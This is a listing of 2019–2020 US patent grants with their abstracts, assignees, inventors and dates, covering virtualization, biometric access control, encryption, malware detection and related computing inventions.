    Assignee: Thales eSecurity, Inc.
    Inventors: Enrique Sanchez, Bernardo Arainty, John Perret, Tomas Arredondo, Pedro Valladares, Guillermo Cordon, Sergio Barcala, Marc Boillot
  • Patent number: 10579412
    Abstract: A method for operating virtual machines on a virtualization platform includes: embedding control information in a predetermined memory area of a front-end virtual machine where at least one virtual device is to be initialized, the control information being required for initiating a communication with a back-end virtual machine where at least one back-end driver runs; retrieving, by the front-end virtual machine, the control information from the predetermined memory area of the front-end virtual machine; and performing the communication between the front-end virtual machine and the back-end virtual machine via a direct communication channel to exchange information for initializing the at least one virtual device of the front-end virtual machine, by communicating with the at least one back-end driver via the direct communication channel. The direct communication channel is established based on the control information embedded in the predetermined memory area of the front-end virtual machine.
    Type: Grant
    Filed: April 7, 2017
    Date of Patent: March 3, 2020
    Assignee: NEC CORPORATION
    Inventors: Filipe Manco, Simon Kuenzer, Florian Schmidt, Felipe Huici
  • Patent number: 10574466
    Abstract: An external biometric reader and verification device for providing access control to a computing device, and associated methods, are disclosed. The external reader can store and verify biometrics under the control of the computing device and send identity verification messages to the computing device. One disclosed device includes a biometric reader communicatively connected to an external secure microcontroller. The external secure microcontroller stores a set of biometric data and a signing key. The signing key can be injected by a device manufacturer in a controlled key injection room in a manufacturing facility and can be used to sign a certificate. An operating system of the computing device can be programmed to send a request for the certificate, receive the certificate, and predicate control of access to the operating system using the verification messages on verification of the certificate.
    Type: Grant
    Filed: July 11, 2019
    Date of Patent: February 25, 2020
    Assignee: Clover Network, Inc.
    Inventors: Narayanan Gopalakrishnan, Yi Sun, Ketan Patwardhan
  • Patent number: 10567394
    Abstract: A system performs cryptographic operations utilizing information usable to verify validity of plaintext. To prevent providing information about a plaintext by providing the information usable to verify the validity of the plaintext, the system provides the information usable to verify validity of the plaintext to an entity on a condition that the entity is authorized to access the plaintext. The information usable to verify validity of the plaintext may be persisted in ciphertext along with the plaintext to enable the plaintext to be verified when decrypted.
    Type: Grant
    Filed: April 10, 2019
    Date of Patent: February 18, 2020
    Assignee: Amazon Technologies, Inc.
    Inventors: Gregory Branchek Roth, Gregory Alan Rubin, Matthew John Campagna, Petr Praus
  • Patent number: 10567566
    Abstract: An approach is provided for providing mechanisms to control unattended notifications at a device. The approach includes determining that at least one notification presented at a device is an unattended notification. The approach also includes causing, at least in part, a presentation of one or more mechanisms for controlling the unattended notification at the device, one or more other devices, or a combination thereof.
    Type: Grant
    Filed: October 16, 2012
    Date of Patent: February 18, 2020
    Assignee: Nokia Technologies Oy
    Inventors: Wenwei Xue, Likhang Chow
  • Patent number: 10534910
    Abstract: Approaches for monitoring a host operating system. A threat model is stored and maintained. The threat model identifies for any process executing on a host operating system how trustworthy the process should be deemed based on a pattern of observed behavior. The execution of the process and those processes in a monitoring circle relationship thereto are monitored. The monitoring circle relationship includes a parent process, any process in communication with a member of monitoring circle relationship, and any process instantiated by a present member of monitoring circle relationship. Observed process behavior is correlated with the threat model. Upon determining that a particular process has behaved in a manner inconsistent with a pattern of allowable behavior identified by the threat model for that process, a responsive action is taken.
    Type: Grant
    Filed: September 21, 2017
    Date of Patent: January 14, 2020
    Assignee: Hewlett-Packard Development Company, L.P.
    Inventor: Rahul C. Kashyap
  • Patent number: 10514945
    Abstract: A hypervisor monitors for an initialization of a guest kernel running on a virtual machine implemented by the hypervisor. When the initialization of the guest kernel is detected, the hypervisor pauses a virtual processor of the virtual machine, locates a guest kernel image of the guest kernel in guest memory, locates a kernel function in the guest kernel image, inserts a breakpoint on the guest kernel function, resumes the virtual processor and monitors for a breakpoint instruction. After detecting the breakpoint instruction, the hypervisor gathers guest context by examining the guest memory and guest registers, pauses the virtual processor, constructs and injects a code gadget configured to run in the virtual machine, diverts the virtual processor to execute the code gadget, which causes the virtual processor to call the hypervisor at the end of executing the code gadget, and returns the virtual processor to execute the guest kernel function.
    Type: Grant
    Filed: February 7, 2018
    Date of Patent: December 24, 2019
    Assignee: NICIRA, INC.
    Inventor: Prasad Dabak
  • Patent number: 10514959
    Abstract: The present invention describes a distributed operating system that allows any local operating system to run more than one cloud-hosted virtual machine. The described system uses three different server clusters: one for storage, one for general processing and another for image processing. The processed image is sent to the user over the network; all the user needs is a screen to display the final image and an input terminal such as a touch screen or a mouse and keyboard.
    Type: Grant
    Filed: December 27, 2013
    Date of Patent: December 24, 2019
    Assignee: SAMSUNG ELETRÔNICA DA AMAZÔNIA LTDA.
    Inventor: Paulo Vitor Sato
  • Patent number: 10511965
    Abstract: A system and method for downloading software is provided. When software is required to be downloaded to the mobile terminal, a software downloading tool on the computer terminal establishes a connection with the mobile terminal via a preloader port of the mobile terminal and sends a download agent (DA) to the mobile terminal. A preloader program of the mobile terminal checks whether the download agent is signed and encrypted by a private key matched with an RSA public key in the preloader program, and if so, the mobile terminal utilizes the download agent to download the software. The method can effectively prevent illegal tools from gaining communication capability with the mobile phone over a USB connection for data deletion or tampering, and reduces the possibility that a hacker defeats the "limiting function" of the mobile phone.
    Type: Grant
    Filed: June 30, 2017
    Date of Patent: December 17, 2019
    Assignee: HuiZhou TCL Mobile Communication Co., Ltd.
    Inventors: Haihui Jiang, Bo Wang
  • Patent number: 10503237
    Abstract: The invention provides multiple secure virtualized environments operating in parallel with optimal resource usage, power consumption and performance. The invention provides a method whereby virtual machines (VMs) have direct access to the computing system's hardware without adding traditional virtualization layers while the hypervisor maintains hardware-enforced isolation between VMs, preventing risks of cross-contamination. Additionally, some of the VMs can be deactivated and reactivated dynamically when needed, which saves the computing system resources. As a result, the invention provides bare-metal hypervisor use and security but without the limitations that make such hypervisors impractical, inefficient and inconvenient for use in mobile devices due to the device's limited CPU and battery power capacity.
    Type: Grant
    Filed: February 13, 2017
    Date of Patent: December 10, 2019
    Assignee: GBS Laboratories, LLC
    Inventor: Oleksii Surdu
  • Patent number: 10485286
    Abstract: A shoe is provided for use by a user and for use with an external reset system that is operable to transmit a reset signal. The shoe comprises a sole, a detector, a memory, a controller, and a receiver. The sole has a top surface for supporting the foot of the user when being worn by the user. The detector generates a parameter signal based on a detected parameter. The controller generates a control signal to activate said detector. The controller further generates a modification signal based on the received reset signal. The memory stores parameter data based on the parameter signal. The memory further modifies the stored parameter data based on the modification signal. The receiver receives the reset signal.
    Type: Grant
    Filed: July 15, 2016
    Date of Patent: November 26, 2019
    Assignee: Under Armour, Inc.
    Inventors: Mark Oleson, F. Grant Kovach, Nathan Dau, Angela Nelligan
  • Patent number: 10482257
    Abstract: A method to enforce secure boot policy in an IHS configured with a plurality of virtual machines. The method includes detecting a request for a virtual machine to access a service processor. In response to detecting the request, the method includes triggering a handshake request between a hypervisor boot emulator and the service processor to initiate a sequence of authentication steps to access a corresponding secure partition of memory from among a plurality of secure partitions of memory associated with the service processor. Each secure partition of memory has a corresponding virtual platform key for preserving secure access to the corresponding secure partition of memory stored in a secure platform. The method further includes dynamically generating unlock keys, derived in part by the corresponding virtual platform key, to authenticate a requesting virtual machine as a valid virtual machine to obtain access to a corresponding secure partition of memory.
    Type: Grant
    Filed: March 16, 2017
    Date of Patent: November 19, 2019
    Assignee: Dell Products, L.P.
    Inventors: Shekar Babu Suryanarayana, Sumanth Vidyadhara, Chandrasekhar Puthillathe
  • Patent number: 10484423
    Abstract: A system for collection and analysis of forensic and event data comprising a server and an endpoint agent operating on a remote system. The server is configured to receive event data including process creation data, persistent process data, thread injection data, network connection data, memory pattern data, or any combination thereof, and analyze the event data to detect compromises of a remote system. The endpoint agent is configured to acquire event data, and communicate the event data to the server.
    Type: Grant
    Filed: February 17, 2017
    Date of Patent: November 19, 2019
    Assignee: SecureWorks Corp.
    Inventors: Ross R. Kinder, Aaron Hackworth, Matthew K. Geiger, Kevin R. Moore, Timothy M. Vidas
  • Patent number: 10474589
    Abstract: The present embodiments relate to methods and apparatuses for side-band management of security for server computers. According to certain aspects, such management is directed to the security of data that is stored under the local control of the server, as well as data that flows through the network ports of the server. Such locally stored data is secured by encryption, and the encryption keys are managed by a management entity that is separate from the server. The management entity can also manage the security of network data flowing through the server using its own configuration of network security applications such as firewalls, monitors and filters.
    Type: Grant
    Filed: March 2, 2016
    Date of Patent: November 12, 2019
    Assignee: JANUS TECHNOLOGIES, INC.
    Inventor: Sofin Raskin
  • Patent number: 10474815
    Abstract: Devices, systems, and methods of detecting user identity, differentiating between users of a computerized service, and detecting a possible attacker. The methods include monitoring of user-side input-unit interactions, in general and in response to an interference introduced to user-interface elements. The monitored interactions are used for detecting an attacker that utilizes a remote access channel; for detecting a malicious automatic script, as well as malicious code injection; to identify a particular hardware assembly; to perform user segmentation or user characterization; to enable a visual login process with implicit two-factor authentication; to enable stochastic cryptography; and to detect that multiple users are utilizing the same subscription account.
    Type: Grant
    Filed: December 8, 2016
    Date of Patent: November 12, 2019
    Assignee: BIOCATCH LTD.
    Inventor: Avi Turgeman
  • Patent number: 10474382
    Abstract: Systems and methods for fast storage allocation for encrypted storage are disclosed. An example method may include receiving, by a processing device executing a hypervisor, an identification of a first storage block that has been released by a first virtual machine; tracking, by the hypervisor, an encryption status corresponding to the first storage block to indicate whether the first storage block contains encrypted content; receiving a request to allocate storage to a second virtual machine; analyzing, by the hypervisor, the first storage block to determine that the first storage block contains encrypted content in view of the encryption status corresponding to the first storage block; and allocating the first storage block containing the encrypted content to the second virtual machine without clearing the encrypted content of the first storage block.
    Type: Grant
    Filed: December 1, 2017
    Date of Patent: November 12, 2019
    Assignee: Red Hat, Inc.
    Inventors: Henri Han Van Riel, Nitesh Narayan Lal
  • Patent number: 10474813
    Abstract: A technique injects code into a suspicious process containing malware executing on a node to enable remediation at the node. Illustratively, the technique may inject code into the suspicious process during instrumentation of the malware in a micro-virtual machine (VM) to monitor malicious behavior and to enable remediation of that behavior at a node embodied as an endpoint. According to the technique, code may be injected into the suspicious process during instrumentation in the micro-VM of the endpoint to restore states of kernel resources (e.g., memory) that may be infected (i.e., altered) by behavior (actions) of the malware.
    Type: Grant
    Filed: October 23, 2015
    Date of Patent: November 12, 2019
    Assignee: FireEye, Inc.
    Inventor: Osman Abdoul Ismael
  • Patent number: 10476853
    Abstract: A system and method for homomorphic encryption in a healthcare network environment is provided and includes receiving digital data over the healthcare network at a data custodian server in a plurality of formats from various data sources, encrypting the data according to a homomorphic encryption scheme, receiving a query at the data custodian server from a data consumer device concerning a portion of the encrypted data, initiating a secure homomorphic work session between the data custodian server and the data consumer device, generating a homomorphic work space associated with the homomorphic work session, compiling, by the data custodian server, a results set satisfying the query, loading the results set into the homomorphic work space, and building an application programming interface (API) compatible with the results set, the API facilitating encrypted analysis on the results set in the homomorphic work space.
    Type: Grant
    Filed: December 20, 2018
    Date of Patent: November 12, 2019
    Assignee: NANTHEALTH, INC
    Inventors: Patrick Soon-Shiong, Harsh Kupwade-Patil, Ravi Seshadri, Nicholas J. Witchey
  • Patent number: 10476891
    Abstract: A system includes one or more “BotMagnet” modules that are exposed to infection by malicious code. The BotMagnets may include one or more virtual machines hosting operating systems in which malicious code may be installed and executed without exposing sensitive data or other parts of a network. In particular, outbound traffic may be transmitted to a Sinkhole module that implements a service requested by the outbound traffic and transmits responses to the malicious code executing within the BotMagnet. Dark space in a network (unused IP addresses, unused ports and absent applications, and invalid usernames and passwords) is consumed by a BotSink such that attempts to access dark space resources will be directed to the BotSink, which will engage the source host of such attempts.
    Type: Grant
    Filed: July 21, 2015
    Date of Patent: November 12, 2019
    Assignee: ATTIVO NETWORKS INC.
    Inventors: Venu Vissamsetty, Srikant Vissamsetti, Shivakumar Buruganahalli
  • Patent number: 10469622
    Abstract: Embodiments include processes, systems, and devices for initiating proximity actions upon the activation of a proximity connection. A proximity service receives an indication from a proximity provider that a proximity connection is established, and then determines a joint proximity context of the proximity connection. The proximity service then initiates a proximity action to facilitate a proximity function indicated by the joint proximity context. Joint proximity contexts include indications that an application has queued content to be shared with a proximity device, that an application has registered to publish messages on a namespace, that an application has subscribed to messages on a namespace, that an application has registered to find a peer application on a proximity device to enable multi-user collaboration, and that a device seeks to pair with another device.
    Type: Grant
    Filed: October 20, 2017
    Date of Patent: November 5, 2019
    Assignee: Microsoft Technology Licensing, LLC
    Inventors: Marc Christopher Pottier, Max Glenn Morris, Travis J. Martin, Michael N. Loholt, Darren R. Davis, Priya Bhushan Dandawate, Kenton A. Shipley, Khurram M. Zia
  • Patent number: 10467632
    Abstract: Embodiments of systems and methods for fraud review are disclosed. The systems may comprise multi-tiered computing systems which may receive fraud alerts from multiple sources. A computing system in a tier may receive a fraud alert and use one or more fraud risk metrics to determine whether the fraud alert should be escalated. If the computing system determines that the fraud alert should be escalated, the computing system may transmit an escalation message to a higher tier computing system. If the computing system determines that the fraud alert should not be escalated, the computing system may transmit a message to a fraud prevention computing system. In some embodiments, the computing system may determine that the fraud alert is a false positive and transmit a false positive message to the source of the fraud alert such as a lower tier computing system.
    Type: Grant
    Filed: December 13, 2017
    Date of Patent: November 5, 2019
    Assignee: Massachusetts Mutual Life Insurance Company
    Inventor: Sears Merritt
  • Patent number: 10469444
    Abstract: The invention presented herein is a system and method for automatically discovering communication capabilities for direct communication between endpoints across one or more unknown networks, the system comprising: a plurality of network-enabled endpoints configured with a module in wireless communication with a management database, the module configured to establish a communication path for direct communication between the network-enabled endpoints, independent of a NAT router.
    Type: Grant
    Filed: October 25, 2018
    Date of Patent: November 5, 2019
    Assignee: IP Technology Labs, LLC
    Inventors: Gary Mitchell, Scott Whittle, Kurt Quasebarth
  • Patent number: 10462136
    Abstract: In one embodiment, a request may be received from a first cloud network of a hybrid cloud environment to transmit data to a second cloud network of the hybrid cloud environment, wherein the request can include a security profile related to the data. The security profile may be automatically analyzed to determine access permissions related to the data. Based at least in part on the access permissions, the data can be allowed access to the second cloud network.
    Type: Grant
    Filed: October 13, 2015
    Date of Patent: October 29, 2019
    Assignee: CISCO TECHNOLOGY, INC.
    Inventors: Mauricio Arregoces, Nagaraj Bagepalli, Subramanian Chandrasekaran
  • Patent number: 10452365
    Abstract: A computer program product according to some embodiments causes a processor to perform operations including disassembling executable code of an application program to provide disassembled code, identifying first wrapping code in the disassembled code, receiving second wrapping code, generating a consolidated application wrapper that manages operation of both the first wrapping code and the second wrapping code, inserting the second wrapping code and the consolidated application wrapper into the disassembled code to form modified disassembled code, and assembling the modified disassembled code to form modified executable code.
    Type: Grant
    Filed: October 19, 2017
    Date of Patent: October 22, 2019
    Assignee: CA, Inc.
    Inventor: Vikrant Nandakumar
  • Patent number: 10445223
    Abstract: Various embodiments are generally directed to techniques of creating or managing one or more virtual services using at least one application programming interface (API). At a plugin layer, a plugin integrator programmatically interfaces with and integrates one or more virtualization tools. The plugin integrator may be programmatically interfaced with the at least one API. At least one proxy agent may be used to run or consume the one or more virtual services. The at least one API and the at least one proxy agent may be implemented in an abstraction layer.
    Type: Grant
    Filed: October 25, 2018
    Date of Patent: October 15, 2019
    Assignee: CAPITAL ONE SERVICES, LLC
    Inventors: Stephen Tkac, Agnibrata Nayak, Pradosh Sivadoss, Govind Pande
  • Patent number: 10431024
    Abstract: An electronic device having at least one operational setting, such as a power setting, with at least a first state and a second state. The electronic device may also include an access controller that can receive state data and authorization data from an external source such as a remote control. The access controller may enable a state of the operational setting upon receipt of proper authorization data received from or related to the output from at least one biometric sensor associated with the remote control.
    Type: Grant
    Filed: May 16, 2017
    Date of Patent: October 1, 2019
    Assignee: Apple Inc.
    Inventors: Michael DiVincent, Nicole J. Hollopeter, Ruben Caballero